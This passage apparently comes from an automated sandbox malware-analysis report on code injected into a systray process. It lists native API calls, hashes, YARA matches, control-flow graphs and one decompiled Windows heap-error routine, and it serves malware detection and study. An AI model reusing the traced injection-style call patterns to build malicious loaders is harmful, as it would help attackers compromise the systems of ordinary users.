                                            • Snapshot File: hcaresult_8_2_170000_systray.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: .z`
                                            • API String ID: 823142352-1441809116
                                            • Opcode ID: a36ec6ebf072920e7321eb393a327257d83141a0fc1e8420568cdd4083f1b552
                                            • Instruction ID: 4ec3a4c266afdca09fe6036cb3a367d11a953e58d8d99c4a56398c4378625123
                                            • Opcode Fuzzy Hash: a36ec6ebf072920e7321eb393a327257d83141a0fc1e8420568cdd4083f1b552
                                            • Instruction Fuzzy Hash: 0101FDB2200108AFCB18DF88CC85EEB77A9AF8C314F118648FA5CD3240C630E811CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtReadFile.NTDLL(00184D32,5EB6522D,FFFFFFFF,001849F1,?,?,00184D32,?,001849F1,FFFFFFFF,5EB6522D,00184D32,?,00000000), ref: 00189E45
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_170000_systray.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: a14a048e923c7aaaef428357be4a6e35befcf2638d540087ad39aa86b4f4e9c0
                                            • Instruction ID: 109d5328e3c5e823b31f18e1e900c2451aac46b4ec9896a971ff87808a12e80d
                                            • Opcode Fuzzy Hash: a14a048e923c7aaaef428357be4a6e35befcf2638d540087ad39aa86b4f4e9c0
                                            • Instruction Fuzzy Hash: E3F0E2B2200108AFDB04DF88CC81EEB77A9AF8C314F028248BE1DA7241D634E9518BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtReadFile.NTDLL(00184D32,5EB6522D,FFFFFFFF,001849F1,?,?,00184D32,?,001849F1,FFFFFFFF,5EB6522D,00184D32,?,00000000), ref: 00189E45
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_170000_systray.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction ID: 70a6e9ecda56bfa331cc1000ea3f7f55c8c2df6f4d9065fe44f64b3b7c0e205f
                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction Fuzzy Hash: 6FF0A4B2200208AFDB14DF89DC91EEB77ADAF8C754F158249BA5D97241D630E9118BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00172D11,00002000,00003000,00000004), ref: 00189F69
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_170000_systray.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                            • Instruction ID: 6223abea82a3792e9c815d57470feb63d0201921d3912ca781493797ed45c7f5
                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                            • Instruction Fuzzy Hash: 9BF015B2200208AFDB14DF89CC81EAB77ADAF88754F118149FE5897241C630F910CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtClose.NTDLL(00184D10,?,?,00184D10,00000000,FFFFFFFF), ref: 00189EA5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                            • Snapshot File: hcaresult_8_2_170000_systray.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 239 18a053-18a05f 240 18a061-18a077 call 18a950 239->240 241 18a0b6-18a0cc call 18a950 239->241 244 18a07c-18a091 RtlFreeHeap 240->244
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00173AF8), ref: 0018A08D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                            • Snapshot File: hcaresult_8_2_170000_systray.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: .z`
                                            • API String ID: 3298025750-1441809116
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 253 18a060-18a076 254 18a07c-18a091 RtlFreeHeap 253->254 255 18a077 call 18a950 253->255 255->254
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00173AF8), ref: 0018A08D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                            • Snapshot File: hcaresult_8_2_170000_systray.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: .z`
                                            • API String ID: 3298025750-1441809116
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0017834A
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0017836B
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                            • Snapshot File: hcaresult_8_2_170000_systray.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 256 1782eb-1782ff 257 178308-17833a call 18c3f0 call 17acc0 call 184e10 256->257 258 178303 call 18b850 256->258 265 17836e-178372 257->265 266 17833c-17834e PostThreadMessageW 257->266 258->257 267 178350-17836b call 17a450 PostThreadMessageW 266->267 268 17836d 266->268 267->268 268->265
                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0017834A
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0017836B
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                            • Snapshot File: hcaresult_8_2_170000_systray.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 481 17acb3-17acba 482 17acbc-17acbe 481->482 483 17ac7b-17ac8a call 17a9e0 481->483 484 17ad16-17ad1e 482->484 485 17acc1-17ace9 call 18c640 482->485 492 17acaf-17acb2 483->492 493 17ac8c-17ac90 483->493 488 17ad37-17ad3a 484->488 489 17ad20-17ad34 LdrLoadDll 484->489 494 17acef-17acfd call 18ca60 485->494 495 17aceb-17acee 485->495 489->488 496 17ac93-17ac9a 493->496 501 17acff-17ad0a call 18cce0 494->501 502 17ad0d-17ad10 494->502 496->496 498 17ac9c-17ac9f 496->498 498->492 499 17aca1-17aca3 498->499 503 17aca6-17acad 499->503 501->502 502->484 505 17ad11 call 18ae90 502->505 503->492 503->503 505->484
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0017AD32
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_170000_systray.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 58a65aae0d3f289b1bbd7ac078db50ae86a016efc8347129f58172f459a08c14
                                            • Instruction ID: e3562cbf66c9ab449c51d99111d1e8d5e2791bf8dca48870ceab2428f316c2c1
                                            • Opcode Fuzzy Hash: 58a65aae0d3f289b1bbd7ac078db50ae86a016efc8347129f58172f459a08c14
                                            • Instruction Fuzzy Hash: 48113F3590814D6BDB21DBA4D845ABCB7749F91308F048196D94C8B142F7319A48C792
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0017AD32
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_170000_systray.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                            • Instruction ID: c2decc3460459ce1bac3f5f5836d96a9939bc8e82055be57644019f4598f490d
                                            • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                            • Instruction Fuzzy Hash: 1E011EB5D4020DABDB10EAE4EC42F9EB378AF54308F4085A5A90D97241F731EB54CBA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0018A124
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_170000_systray.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: 813edb78cd1334d5ba3ee33aac08ae8e99ae7eecb60f07bb091d68f6c6c5a22b
                                            • Instruction ID: c2caff7a0ccde91efc8419dfba78c2f4a106e31d9d3417a2f5cd8eca93443043
                                            • Opcode Fuzzy Hash: 813edb78cd1334d5ba3ee33aac08ae8e99ae7eecb60f07bb091d68f6c6c5a22b
                                            • Instruction Fuzzy Hash: 79013CB2644119AFDB14DF98DC85EEB77ADEF8C350F118259FA5CD7240C231EA118BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0018A124
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_170000_systray.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction ID: 21b30c26ed4763361d14d114036541ddc97d26dde010edfe162c8f1a4945b346
                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction Fuzzy Hash: 9701B2B2214108BFCB54DF89DC81EEB77ADAF8C754F158258FA4D97241C630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0018A124
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_170000_systray.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: 6568c6f1e6253b2b02eb30758e7b714880dbda6b73f2441df9ffdc7279775669
                                            • Instruction ID: 08f0062f5e974ee7b608718773ee26ca65cc0a8c63977493eb324e6e5b414510
                                            • Opcode Fuzzy Hash: 6568c6f1e6253b2b02eb30758e7b714880dbda6b73f2441df9ffdc7279775669
                                            • Instruction Fuzzy Hash: DA01B2B2210108BFCB54DF99DD80EEB37ADAF8C754F158248FA4DA7250C630E951CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0017F192,0017F192,?,00000000,?,?), ref: 0018A1F0
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_170000_systray.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 113cd6751c334813f425fca246b6023a88eaf8a33c14c2ed373027101bf1ccec
                                            • Instruction ID: 56819f9ed0bcf05f8fdd919b40ea3b1678f427408cce804fd3c4edf70180ca0d
                                            • Opcode Fuzzy Hash: 113cd6751c334813f425fca246b6023a88eaf8a33c14c2ed373027101bf1ccec
                                            • Instruction Fuzzy Hash: 88F0A9B9204204AFEB10EF69DC85D9B3BA8EF84350F11855AFDE857202C630E9108BB2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlAllocateHeap.NTDLL(001844F6,?,00184C6F,00184C6F,?,001844F6,?,?,?,?,?,00000000,00000000,?), ref: 0018A04D
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_170000_systray.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction ID: 17e8cc399ffb6a09b809b22d02fb6e3212f4d1ad0ffe1c48e945b257afe9ed6f
                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction Fuzzy Hash: 21E012B1200208ABDB14EF99CC41EA777ACAF88654F118599FA585B242C630F9108BB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0017F192,0017F192,?,00000000,?,?), ref: 0018A1F0
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_170000_systray.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction ID: e7bb114500fe75c87134f235cda2ae89cf967753b4c687adbc66b62f36d38c92
                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction Fuzzy Hash: CDE01AB1600208ABDB10EF49CC85EE737ADAF88650F018155FA4C57241CA34E9108BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetErrorMode.KERNEL32(00008003,?,00178CF4,?), ref: 0017F6BB
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_170000_systray.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: 8edbe3729de3733b21f8ed8db093e17e711b582bef10c3ecbd40d2fb00b2368d
                                            • Instruction ID: 05b46d86b8b27bd64e44958691586c1fc072ce536cc42bea082df66a84f27d13
                                            • Opcode Fuzzy Hash: 8edbe3729de3733b21f8ed8db093e17e711b582bef10c3ecbd40d2fb00b2368d
                                            • Instruction Fuzzy Hash: 1FE0C273A903053FE710EAA4DC03FBA3298AB65711F184078F94CEB2C3EB18D0024560
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetErrorMode.KERNEL32(00008003,?,00178CF4,?), ref: 0017F6BB
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_170000_systray.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                            • Instruction ID: db5f5061f9013b61f9b5a262e6c827fa793f6ca12042b6bc679c4cdb0bad1a74
                                            • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                            • Instruction Fuzzy Hash: 18D052726903082BEA10BAA89C03F663288AB54B00F494068FA48AA2C3EA64E5018665
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: dee7332ac4216be31e7ad7a1070bfdfe73aa778b9c6cf5f74467068656396676
                                            • Instruction ID: 7a557385e4b00852d5b676f671d2464c92e6458dc5a901dc58c526dcbd4b8637
                                            • Opcode Fuzzy Hash: dee7332ac4216be31e7ad7a1070bfdfe73aa778b9c6cf5f74467068656396676
                                            • Instruction Fuzzy Hash: 11B02BB19010C1C5F710D7710A0873739007BC0340F12C011D1020240A0338D080F2B2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Strings
                                            • *** An Access Violation occurred in %ws:%s, xrefs: 0464B48F
                                            • *** then kb to get the faulting stack, xrefs: 0464B51C
                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0464B3D6
                                            • *** enter .cxr %p for the context, xrefs: 0464B50D
                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0464B38F
                                            • *** enter .exr %p for the exception record, xrefs: 0464B4F1
                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0464B476
                                            • write to, xrefs: 0464B4A6
                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 0464B352
                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0464B2F3
                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0464B314
                                            • a NULL pointer, xrefs: 0464B4E0
                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0464B2DC
                                            • The resource is owned shared by %d threads, xrefs: 0464B37E
                                            • This failed because of error %Ix., xrefs: 0464B446
                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0464B53F
                                            • <unknown>, xrefs: 0464B27E, 0464B2D1, 0464B350, 0464B399, 0464B417, 0464B48E
                                            • Go determine why that thread has not released the critical section., xrefs: 0464B3C5
                                            • an invalid address, %p, xrefs: 0464B4CF
                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0464B305
                                            • read from, xrefs: 0464B4AD, 0464B4B2
                                            • The instruction at %p tried to %s , xrefs: 0464B4B6
                                            • The resource is owned exclusively by thread %p, xrefs: 0464B374
                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0464B39B
                                            • The instruction at %p referenced memory at %p., xrefs: 0464B432
                                            • The critical section is owned by thread %p., xrefs: 0464B3B9
                                            • *** Inpage error in %ws:%s, xrefs: 0464B418
                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0464B323
                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0464B47D
                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0464B484
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                            • API String ID: 0-108210295
                                            • Opcode ID: 28369ff9c46ee613415c70872de0a87448a3d538ba887cacb240831d78fd5218
                                            • Instruction ID: 1d06200253cb5aa9ce0568c08b0b76cc7f9d697b1fa6d35d45ab548b3a28ae7e
                                            • Opcode Fuzzy Hash: 28369ff9c46ee613415c70872de0a87448a3d538ba887cacb240831d78fd5218
                                            • Instruction Fuzzy Hash: 7A81F275A40210FFEF26AE05CC46E7B3B76AF96B55F004048F105AB256F661F402EEB6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 44%
                                            			E04651C06() {
                                            				signed int _t27;
                                            				char* _t104;
                                            				char* _t105;
                                            				intOrPtr _t113;
                                            				intOrPtr _t115;
                                            				intOrPtr _t117;
                                            				intOrPtr _t119;
                                            				intOrPtr _t120;
                                            
                                            				_t105 = 0x45748a4;
                                            				_t104 = "HEAP: ";
                                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            					_push(_t104);
                                            					E0459B150();
                                            				} else {
                                            					E0459B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            				}
                                            				_push( *0x468589c);
                                            				E0459B150("Heap error detected at %p (heap handle %p)\n",  *0x46858a0);
                                            				_t27 =  *0x4685898; // 0x0
                                            				if(_t27 <= 0xf) {
                                            					switch( *((intOrPtr*)(_t27 * 4 +  &M04651E96))) {
                                            						case 0:
                                            							_t105 = "heap_failure_internal";
                                            							goto L21;
                                            						case 1:
                                            							goto L21;
                                            						case 2:
                                            							goto L21;
                                            						case 3:
                                            							goto L21;
                                            						case 4:
                                            							goto L21;
                                            						case 5:
                                            							goto L21;
                                            						case 6:
                                            							goto L21;
                                            						case 7:
                                            							goto L21;
                                            						case 8:
                                            							goto L21;
                                            						case 9:
                                            							goto L21;
                                            						case 0xa:
                                            							goto L21;
                                            						case 0xb:
                                            							goto L21;
                                            						case 0xc:
                                            							goto L21;
                                            						case 0xd:
                                            							goto L21;
                                            						case 0xe:
                                            							goto L21;
                                            						case 0xf:
                                            							goto L21;
                                            					}
                                            				}
                                            				L21:
                                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            					_push(_t104);
                                            					E0459B150();
                                            				} else {
                                            					E0459B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            				}
                                            				_push(_t105);
                                            				E0459B150("Error code: %d - %s\n",  *0x4685898);
                                            				_t113 =  *0x46858a4; // 0x0
                                            				if(_t113 != 0) {
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push(_t104);
                                            						E0459B150();
                                            					} else {
                                            						E0459B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					E0459B150("Parameter1: %p\n",  *0x46858a4);
                                            				}
                                            				_t115 =  *0x46858a8; // 0x0
                                            				if(_t115 != 0) {
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push(_t104);
                                            						E0459B150();
                                            					} else {
                                            						E0459B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					E0459B150("Parameter2: %p\n",  *0x46858a8);
                                            				}
                                            				_t117 =  *0x46858ac; // 0x0
                                            				if(_t117 != 0) {
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push(_t104);
                                            						E0459B150();
                                            					} else {
                                            						E0459B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					E0459B150("Parameter3: %p\n",  *0x46858ac);
                                            				}
                                            				_t119 =  *0x46858b0; // 0x0
                                            				if(_t119 != 0) {
                                            					L41:
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push(_t104);
                                            						E0459B150();
                                            					} else {
                                            						E0459B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					_push( *0x46858b4);
                                            					E0459B150("Last known valid blocks: before - %p, after - %p\n",  *0x46858b0);
                                            				} else {
                                            					_t120 =  *0x46858b4; // 0x0
                                            					if(_t120 != 0) {
                                            						goto L41;
                                            					}
                                            				}
                                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            					_push(_t104);
                                            					E0459B150();
                                            				} else {
                                            					E0459B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            				}
                                            				return E0459B150("Stack trace available at %p\n", 0x46858c0);
                                            			}












                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
